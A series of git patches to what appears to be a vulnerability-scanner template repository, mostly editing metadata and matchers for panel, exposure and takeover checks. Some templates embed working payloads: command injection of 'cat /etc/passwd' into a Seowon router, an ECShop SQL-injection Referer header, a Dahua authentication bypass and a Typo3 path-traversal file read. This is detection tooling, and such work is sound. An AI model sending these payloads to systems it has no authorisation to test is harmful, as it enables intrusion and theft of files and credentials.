info: name: Pentaho Panel author: princechaddha severity: info + metadata: + shodan-query: 'pentaho' tags: panel,pentaho requests: From 268f6c7c86d0f97f6fc935a5804160135aa01a36 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Nov 2021 06:51:55 +0000 Subject: [PATCH 3489/4083] Auto Generated CVE annotations [Mon Nov 8 06:51:55 UTC 2021] :robot: --- cves/2021/CVE-2021-31602.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-31602.yaml b/cves/2021/CVE-2021-31602.yaml index 6c70f13190..3b8ecf630d 100644 --- a/cves/2021/CVE-2021-31602.yaml +++ b/cves/2021/CVE-2021-31602.yaml @@ -12,6 +12,7 @@ info: shodan-query: 'Pentaho' tags: cve,cve2021,pentaho,auth-bypass + description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n\n" requests: - method: GET path: From 797394836027a74b3dcc350d7d956c8c67823e58 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 12:43:14 +0530 Subject: [PATCH 3490/4083] Update seowon-router-rce.yaml --- vulnerabilities/other/seowon-router-rce.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/other/seowon-router-rce.yaml b/vulnerabilities/other/seowon-router-rce.yaml index defdb8efb9..b6a090488b 100644 --- a/vulnerabilities/other/seowon-router-rce.yaml +++ b/vulnerabilities/other/seowon-router-rce.yaml @@ -1,12 +1,12 @@ id: seowon-router-rce info: - name: Seowon 130-SLC router - Remote Code Execution (Unauthenticated) + name: Seowon 130-SLC router - Remote Code Execution (Unauthenticated) author: gy741 severity: critical - reference: https://www.exploit-db.com/exploits/50295 - tags: rce,seowon description: Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page + reference: https://www.exploit-db.com/exploits/50295 + tags: rce,seowon,router,unauth requests: - raw: @@ -20,7 +20,7 @@ requests: Referer: http://{{Hostname}}/diagnostic.html?t=201701020919 Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin Connection: keep-alive - + Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928 matchers-condition: and From bde7d5243bfe0a11d13dd4b810aa1cb11c37a56f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 12:45:04 +0530 Subject: [PATCH 3491/4083] Update CVE-2019-1821.yaml --- cves/2019/CVE-2019-1821.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-1821.yaml b/cves/2019/CVE-2019-1821.yaml index 0601746190..f8366b49a8 100644 --- a/cves/2019/CVE-2019-1821.yaml +++ b/cves/2019/CVE-2019-1821.yaml @@ -1,7 +1,7 @@ id: CVE-2019-1821 info: - name: Cisco prime infrastructure unauthorized RCE (CVE-2019-1821) + name: Cisco Prime Infrastructure Unauthorized RCE (CVE-2019-1821) author: _0xf4n9x_ severity: high description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability. @@ -9,6 +9,8 @@ info: - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html - https://nvd.nist.gov/vuln/detail/CVE-2019-1821 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821 + metadata: + shodan-query: 'http.title:"prime infrastructure"' tags: rce,fileupload,unauth,cve,cve2019 requests: From 06bb1f444c6b67287cd0493e9165a3b5ae8a1030 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 12:49:37 +0530 Subject: [PATCH 3492/4083] Update seowon-router-rce.yaml --- vulnerabilities/other/seowon-router-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/seowon-router-rce.yaml b/vulnerabilities/other/seowon-router-rce.yaml index b6a090488b..afb29f03f3 100644 --- a/vulnerabilities/other/seowon-router-rce.yaml +++ b/vulnerabilities/other/seowon-router-rce.yaml @@ -17,7 +17,7 @@ requests: Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded - Referer: http://{{Hostname}}/diagnostic.html?t=201701020919 + Referer: {{BaseURL}}/diagnostic.html?t=201701020919 Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin Connection: keep-alive From 23b9517674e241d9c8bc550959f9588a5fac8fe4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 12:54:34 +0530 Subject: [PATCH 3493/4083] Update CVE-2019-1821.yaml --- cves/2019/CVE-2019-1821.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-1821.yaml b/cves/2019/CVE-2019-1821.yaml index f8366b49a8..6e8f97c3c0 100644 --- a/cves/2019/CVE-2019-1821.yaml +++ b/cves/2019/CVE-2019-1821.yaml @@ -3,7 +3,7 @@ id: CVE-2019-1821 info: name: Cisco Prime Infrastructure Unauthorized RCE (CVE-2019-1821) author: _0xf4n9x_ - severity: high + severity: critical description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability. reference: - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html From 0ebf75eb809fecf6e3be439384d98febaea49fa1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 13:03:48 +0530 Subject: [PATCH 3494/4083] Delete desktop-ini-exposure.yaml --- exposures/files/desktop-ini-exposure.yaml | 35 ----------------------- 1 file changed, 35 deletions(-) delete mode 100644 exposures/files/desktop-ini-exposure.yaml diff --git a/exposures/files/desktop-ini-exposure.yaml b/exposures/files/desktop-ini-exposure.yaml deleted file mode 100644 index 6a421af051..0000000000 --- a/exposures/files/desktop-ini-exposure.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: desktop-ini-exposure - -info: - name: desktop.ini exposure - author: dhiyaneshDk - severity: info - metadata: - shodan-query: 'html:"desktop.ini"' - tags: exposure,config - -requests: - - method: GET - path: - - "{{BaseURL}}/desktop.ini" - - matchers-condition: and - matchers: - - - type: word - part: header - words: - - "application/octet-stream" - - "text/plain" - condition: or - - - type: word - part: body - words: - - "[.ShellClassInfo]" - - "[LocalizedFileNames]" - condition: or - - - type: status - status: - - 200 From 7fed80aa861a62df2fa7998a6d4aa876c973c578 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 13:14:40 +0530 Subject: [PATCH 3495/4083] Update ms-active-directory-certificate-services-detect.yaml --- .../ms-active-directory-certificate-services-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/ms-active-directory-certificate-services-detect.yaml b/exposed-panels/ms-active-directory-certificate-services-detect.yaml index 972a8200a2..eec236aa90 100644 --- a/exposed-panels/ms-active-directory-certificate-services-detect.yaml +++ b/exposed-panels/ms-active-directory-certificate-services-detect.yaml @@ -11,8 +11,8 @@ requests: path: - "{{BaseURL}}" -redirects: true -max-redirects: 2 + redirects: true + max-redirects: 2 matchers-condition: and matchers: From 12f45cf59e33247ab54908b15c3898c015e26380 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 13:19:47 +0530 Subject: [PATCH 3496/4083] Update shoutcast-server.yaml --- exposed-panels/shoutcast-server.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/shoutcast-server.yaml b/exposed-panels/shoutcast-server.yaml index 8a165cfb61..8481c0ec47 100644 --- a/exposed-panels/shoutcast-server.yaml +++ b/exposed-panels/shoutcast-server.yaml @@ -4,9 +4,9 @@ info: name: SHOUTcast Server author: dhiyaneshDk severity: info - tags: panel metadata: shodan-query: 'http.title:"SHOUTcast Server"' + tags: panel requests: - method: GET From 2084ec692e6ad7f6493a59bcaca6bc823851276e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 13:20:28 +0530 Subject: [PATCH 3497/4083] Update pentaho-panel.yaml --- exposed-panels/pentaho-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/pentaho-panel.yaml b/exposed-panels/pentaho-panel.yaml index cb4450b79f..c60e2993a0 100644 --- a/exposed-panels/pentaho-panel.yaml +++ b/exposed-panels/pentaho-panel.yaml @@ -2,7 +2,7 @@ id: pentaho-panel info: name: Pentaho Panel - author: princechaddha + author: princechaddha,dhiyaneshDK severity: info metadata: shodan-query: 'pentaho' From 322157b706342389c3e9b5a43a5a5fcf4d2666b3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 13:21:30 +0530 Subject: [PATCH 3498/4083] Delete pentaho-login.yaml --- exposed-panels/pentaho-login.yaml | 24 ------------------------ 1 file changed, 24 deletions(-) delete mode 100644 exposed-panels/pentaho-login.yaml diff --git a/exposed-panels/pentaho-login.yaml b/exposed-panels/pentaho-login.yaml deleted file mode 100644 index effc8c6759..0000000000 --- a/exposed-panels/pentaho-login.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: pentaho-login - -info: - name: Pentaho User Console - Login - author: dhiyaneshDK - severity: info - metadata: - shodan-query: 'http.title:"Pentaho User Console - Login"' - tags: panel,pentaho - -requests: - - method: GET - path: - - '{{BaseURL}}/pentaho/Login' - - matchers-condition: and - matchers: - - type: word - words: - - 'Pentaho User Console - Login' - - - type: status - status: - - 200 From 425f3636ded3b6934e9bb28d309c072a93de08ad Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 13:23:19 +0530 Subject: [PATCH 3499/4083] Update meshcentral-login.yaml --- exposed-panels/meshcentral-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/meshcentral-login.yaml b/exposed-panels/meshcentral-login.yaml index b6084c21de..62b7a74bd7 100644 --- a/exposed-panels/meshcentral-login.yaml +++ b/exposed-panels/meshcentral-login.yaml @@ -4,9 +4,9 @@ info: name: MeshCentral - Login author: dhiyaneshDk severity: info - tags: panel metadata: shodan-query: 'http.title:"MeshCentral - Login"' + tags: panel,meshcentral requests: - method: GET From a1676fc0b0c142f4b80c7e42512dd7f667c79520 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 13:24:18 +0530 Subject: [PATCH 3500/4083] Update kerio-connect-client.yaml --- exposed-panels/kerio-connect-client.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/kerio-connect-client.yaml b/exposed-panels/kerio-connect-client.yaml index 0c7a6db98d..eb3ea924c3 100644 --- a/exposed-panels/kerio-connect-client.yaml +++ b/exposed-panels/kerio-connect-client.yaml @@ -4,9 +4,9 @@ info: name: Kerio Connect Client author: dhiyaneshDk severity: info - tags: panel metadata: shodan-query: 'http.title:"Kerio Connect Client"' + tags: panel,kerio requests: - method: GET From 283e16333070bff9cf93479c63adeba8c9332fe6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 13:28:50 +0530 Subject: [PATCH 3501/4083] Update cisco-prime-infrastructure.yaml --- exposed-panels/cisco/cisco-prime-infrastructure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/cisco/cisco-prime-infrastructure.yaml b/exposed-panels/cisco/cisco-prime-infrastructure.yaml index 3338eacc3c..1ef40b53b8 100644 --- a/exposed-panels/cisco/cisco-prime-infrastructure.yaml +++ b/exposed-panels/cisco/cisco-prime-infrastructure.yaml @@ -4,9 +4,9 @@ info: name: Cisco Prime Infrastructure author: dhiyaneshDk severity: info - tags: panel,cisco metadata: shodan-query: 'http.title:"prime infrastructure"' + tags: panel,cisco requests: - method: GET @@ -18,7 +18,7 @@ requests: - type: word part: body words: - - "Prime Infrastructure" + - 'productName = "Prime Infrastructure"' - "Cisco " - type: status From 85741bbcf9d721c79c6a9a823a9e6c6883579102 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 13:42:13 +0530 Subject: [PATCH 3502/4083] Update and rename ecshop-sql.yaml to ecshop-sqli.yaml --- .../{ecshop-sql.yaml => ecshop-sqli.yaml} | 23 +++++++++++-------- 1 file changed, 13 insertions(+), 10 deletions(-) rename vulnerabilities/other/{ecshop-sql.yaml => ecshop-sqli.yaml} (57%) diff --git a/vulnerabilities/other/ecshop-sql.yaml b/vulnerabilities/other/ecshop-sqli.yaml similarity index 57% rename from vulnerabilities/other/ecshop-sql.yaml rename to vulnerabilities/other/ecshop-sqli.yaml index 36f89c06e6..1e840419e0 100644 --- a/vulnerabilities/other/ecshop-sql.yaml +++ b/vulnerabilities/other/ecshop-sqli.yaml @@ -1,13 +1,18 @@ +id: ecshop-sqli + info: - name: Ecshop-SQL + name: Ecshop SQLi author: Lark-lab,ImNightmaree - severity: critical - tags: sql,php,cms + severity: high + reference: + - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a + - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html + tags: sqli,php,cms,ecshop requests: - raw: - | - POST /user.php HTTP/1.1 + GET /user.php?act=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 @@ -15,13 +20,11 @@ requests: Accept-Encoding: gzip, deflate Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 - username=admin&password=123456&act=act_login - matchers: - - type: word words: - - 'XPATH' - - 'MySQL' - - 'Array' + - 'XPATH syntax error:'' + - '[error] =>' + - '[0] => Array' + - 'MySQL server error report:Array' condition: and From 5a6c30c7cf31debf1786cfadd0f2517abcb066ed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 13:42:44 +0530 Subject: [PATCH 3503/4083] Update ecshop-sqli.yaml --- vulnerabilities/other/ecshop-sqli.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/ecshop-sqli.yaml b/vulnerabilities/other/ecshop-sqli.yaml index 1e840419e0..f0e63075ae 100644 --- a/vulnerabilities/other/ecshop-sqli.yaml +++ b/vulnerabilities/other/ecshop-sqli.yaml @@ -23,7 +23,7 @@ requests: matchers: - type: word words: - - 'XPATH syntax error:'' + - 'XPATH syntax error:' - '[error] =>' - '[0] => Array' - 'MySQL server error report:Array' From cb74944f437442ff8f70533462e9277afc62fd74 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 8 Nov 2021 15:45:54 +0530 Subject: [PATCH 3504/4083] misc updates --- cves/2021/CVE-2021-33044.yaml | 12 ++++++------ default-logins/pentaho/pentaho-default-login.yaml | 2 +- vulnerabilities/other/ecshop-sqli.yaml | 5 +---- vulnerabilities/other/seowon-router-rce.yaml | 5 +---- 4 files changed, 9 insertions(+), 15 deletions(-) diff --git a/cves/2021/CVE-2021-33044.yaml b/cves/2021/CVE-2021-33044.yaml index 6af86d7e1f..59c60d4854 100644 --- a/cves/2021/CVE-2021-33044.yaml +++ b/cves/2021/CVE-2021-33044.yaml @@ -25,8 +25,8 @@ requests: Connection: close X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Origin: http://{{Hostname}}/ - Referer: http://{{Hostname}}/ + Origin: {{BaseURL}} + Referer: {{BaseURL}} {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} @@ -40,10 +40,10 @@ requests: - type: word part: body words: - - "\"result\":true" - - "id" - - "params" - - "session" + - '"result":true' + - 'id' + - 'params' + - 'session' condition: and extractors: diff --git a/default-logins/pentaho/pentaho-default-login.yaml b/default-logins/pentaho/pentaho-default-login.yaml index 522b3bf9bd..0963f688ac 100644 --- a/default-logins/pentaho/pentaho-default-login.yaml +++ b/default-logins/pentaho/pentaho-default-login.yaml @@ -6,7 +6,7 @@ info: severity: high metadata: shodan-query: 'pentaho' - tags: pentaho,default-login,panel + tags: pentaho,default-login requests: - raw: diff --git a/vulnerabilities/other/ecshop-sqli.yaml b/vulnerabilities/other/ecshop-sqli.yaml index f0e63075ae..57da7ee7d0 100644 --- a/vulnerabilities/other/ecshop-sqli.yaml +++ b/vulnerabilities/other/ecshop-sqli.yaml @@ -7,7 +7,7 @@ info: reference: - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html - tags: sqli,php,cms,ecshop + tags: sqli,php,ecshop requests: - raw: @@ -15,10 +15,7 @@ requests: GET /user.php?act=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;} - Accept-Encoding: gzip, deflate - Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 matchers: - type: word diff --git a/vulnerabilities/other/seowon-router-rce.yaml b/vulnerabilities/other/seowon-router-rce.yaml index afb29f03f3..96ad415823 100644 --- a/vulnerabilities/other/seowon-router-rce.yaml +++ b/vulnerabilities/other/seowon-router-rce.yaml @@ -13,9 +13,6 @@ requests: - | POST / HTTP/1.1 Host: {{Hostname}} - Accept: */* - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/diagnostic.html?t=201701020919 Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin @@ -26,9 +23,9 @@ requests: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0" - part: body - type: status status: From bd077e161be4f1a47c7237d38490eda92ee378d0 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Mon, 8 Nov 2021 16:16:02 +0000 Subject: [PATCH 3505/4083] Update freshdesk-takeover.yaml Closes #3106 --- takeovers/freshdesk-takeover.yaml | 10 ++-------- 1 file changed, 2 insertions(+), 8 deletions(-) diff --git a/takeovers/freshdesk-takeover.yaml b/takeovers/freshdesk-takeover.yaml index 7ad85a3e7f..d38c153091 100644 --- a/takeovers/freshdesk-takeover.yaml +++ b/takeovers/freshdesk-takeover.yaml @@ -16,11 +16,5 @@ requests: matchers: - type: word words: - - There is no helpdesk here! - - Maybe this is still fresh! - condition: and - - - type: word - words: - - "freshservice.com" - negative: true + - "404.css" + - "freshdesk.com/signup" From 31d28171a191340cdaf33ccd2fd735f86e1ffffc Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Mon, 8 Nov 2021 16:19:19 +0000 Subject: [PATCH 3506/4083] Appears to work fine with another matcher. Adds an extra matcher. --- takeovers/freshdesk-takeover.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/takeovers/freshdesk-takeover.yaml b/takeovers/freshdesk-takeover.yaml index d38c153091..f10443ac4a 100644 --- a/takeovers/freshdesk-takeover.yaml +++ b/takeovers/freshdesk-takeover.yaml @@ -18,3 +18,9 @@ requests: words: - "404.css" - "freshdesk.com/signup" + condition: and + + - type: dsl + dsl: + - contains(host,"freshpo.com") + negative: true From 6557844a5564f31209596c847bca131ed36bcc44 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 8 Nov 2021 21:52:11 +0530 Subject: [PATCH 3507/4083] misc updates --- takeovers/freshdesk-takeover.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/takeovers/freshdesk-takeover.yaml b/takeovers/freshdesk-takeover.yaml index f10443ac4a..d3650572d8 100644 --- a/takeovers/freshdesk-takeover.yaml +++ b/takeovers/freshdesk-takeover.yaml @@ -16,11 +16,11 @@ requests: matchers: - type: word words: - - "404.css" - - "freshdesk.com/signup" + - 'There is no helpdesk here!' + - 'May be this is still fresh!' + - 'freshdesk.com/signup' condition: and - type: dsl dsl: - - contains(host,"freshpo.com") - negative: true + - '!contains(host,"freshpo.com")' \ No newline at end of file From bdee3e596cebe7e1b37e9c5da9b805c7e0c5b8f9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 8 Nov 2021 22:01:37 +0530 Subject: [PATCH 3508/4083] Improved tumblr takeover template --- takeovers/tumblr-takeover.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/takeovers/tumblr-takeover.yaml b/takeovers/tumblr-takeover.yaml index 0206e1734e..c88f3f75a3 100644 --- a/takeovers/tumblr-takeover.yaml +++ b/takeovers/tumblr-takeover.yaml @@ -12,9 +12,14 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - Whatever you were looking for doesn't currently exist at this address. - There's nothing here. - condition: and \ No newline at end of file + condition: and + + - type: dsl + dsl: + - '!contains(host,"tumblr.com")' \ No newline at end of file From ee08f20f8b2675a6f26bb07591a7bccdefa6d715 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 8 Nov 2021 22:24:03 +0530 Subject: [PATCH 3509/4083] improved shopify takeover detection --- takeovers/shopify-takeover.yaml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/takeovers/shopify-takeover.yaml b/takeovers/shopify-takeover.yaml index 66f65fc4ce..8da69c54c4 100644 --- a/takeovers/shopify-takeover.yaml +++ b/takeovers/shopify-takeover.yaml @@ -12,8 +12,18 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: + - 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"' - "Sorry, this shop is currently unavailable." - - 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"' \ No newline at end of file + condition: or + + - type: word + words: + - 'shop-not-found' + + - type: dsl + dsl: + - '!contains(host,"myshopify.com")' \ No newline at end of file From 6c5e188fd9a59af12aa87402f3e1060dd524a2fd Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 8 Nov 2021 14:08:34 -0300 Subject: [PATCH 3510/4083] Update bigcartel-takeover.yaml --- takeovers/bigcartel-takeover.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/takeovers/bigcartel-takeover.yaml b/takeovers/bigcartel-takeover.yaml index c9c8ca3393..dbe65c8698 100644 --- a/takeovers/bigcartel-takeover.yaml +++ b/takeovers/bigcartel-takeover.yaml @@ -11,7 +11,11 @@ requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - - "

    Oops! We couldn’t find that page.

    " \ No newline at end of file + - "

    Oops! We couldn’t find that page.

    " + - type: dsl + dsl: + - '!contains(host,"bigcartel.com")' From ca798d2ef9968fe8ad624d150082eed7a7f68837 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 8 Nov 2021 14:15:37 -0300 Subject: [PATCH 3511/4083] Update github-takeover.yaml example nuclei -t github-takeover.yaml -u https://ntp.hq.githubapp.com --- takeovers/github-takeover.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml index 0fb086c33d..ed2d19cdd6 100644 --- a/takeovers/github-takeover.yaml +++ b/takeovers/github-takeover.yaml @@ -11,9 +11,12 @@ requests: - method: GET path: - "{{BaseURL}}" - + matchers-condition: and matchers: - type: word words: - "There isn't a GitHub Pages site here." - - "For root URLs (like http://example.com/) you must provide an index.html file" \ No newline at end of file + - "For root URLs (like http://example.com/) you must provide an index.html file" + - type: dsl + dsl: + - '!contains(host,"githubapp.com")' From 356a56ac206b76a7fe283de641e07a80e75b8a86 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 8 Nov 2021 22:51:52 +0530 Subject: [PATCH 3512/4083] Update github-takeover.yaml --- takeovers/github-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml index ed2d19cdd6..84b79502b6 100644 --- a/takeovers/github-takeover.yaml +++ b/takeovers/github-takeover.yaml @@ -19,4 +19,4 @@ requests: - "For root URLs (like http://example.com/) you must provide an index.html file" - type: dsl dsl: - - '!contains(host,"githubapp.com")' + - '!contains(host,"githubapp.com")' From 3665a3e0b815458ba76a9163b032a2e32c7da11b Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 8 Nov 2021 22:52:12 +0530 Subject: [PATCH 3513/4083] Update github-takeover.yaml --- takeovers/github-takeover.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml index 84b79502b6..50b1196a48 100644 --- a/takeovers/github-takeover.yaml +++ b/takeovers/github-takeover.yaml @@ -11,12 +11,14 @@ requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - "There isn't a GitHub Pages site here." - "For root URLs (like http://example.com/) you must provide an index.html file" + - type: dsl dsl: - '!contains(host,"githubapp.com")' From 8e1688ca3b3a25c41d0eec63e7b0eb272a91edbc Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 8 Nov 2021 22:53:00 +0530 Subject: [PATCH 3514/4083] Update bigcartel-takeover.yaml --- takeovers/bigcartel-takeover.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/takeovers/bigcartel-takeover.yaml b/takeovers/bigcartel-takeover.yaml index dbe65c8698..92b203c26f 100644 --- a/takeovers/bigcartel-takeover.yaml +++ b/takeovers/bigcartel-takeover.yaml @@ -11,11 +11,13 @@ requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - "

    Oops! We couldn’t find that page.

    " + - type: dsl dsl: - '!contains(host,"bigcartel.com")' From 78e4f6d7c45d90bf2b4e0fb9dd035030dec12f17 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 8 Nov 2021 22:54:50 +0530 Subject: [PATCH 3515/4083] Update bigcartel-takeover.yaml --- takeovers/bigcartel-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/bigcartel-takeover.yaml b/takeovers/bigcartel-takeover.yaml index 92b203c26f..745c7f51c0 100644 --- a/takeovers/bigcartel-takeover.yaml +++ b/takeovers/bigcartel-takeover.yaml @@ -20,4 +20,4 @@ requests: - type: dsl dsl: - - '!contains(host,"bigcartel.com")' + - '!contains(host,"bigcartel.com")' From 285c2ca8565ccdb8e00bc7d0e2ae9f8580154cde Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 9 Nov 2021 07:35:51 +0900 Subject: [PATCH 3516/4083] Create CVE-2017-15363.yaml --- CVE-2017-15363.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 CVE-2017-15363.yaml diff --git a/CVE-2017-15363.yaml b/CVE-2017-15363.yaml new file mode 100644 index 0000000000..f0e1f375b8 --- /dev/null +++ b/CVE-2017-15363.yaml @@ -0,0 +1,36 @@ +id: CVE-2017-15363 +info: + name: Typo3 Restler Extension - Local File Disclosure + author: 0x_Akoko + severity: high + description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter. + reference: + - https://www.exploit-db.com/exploits/42985 + - https://www.cvedetails.com/cve/CVE-2017-15363 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-15363 + cwe-id: CWE-98 + tags: cve,cve2017,restler,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php" + + matchers-condition: and + matchers: + - type: word + 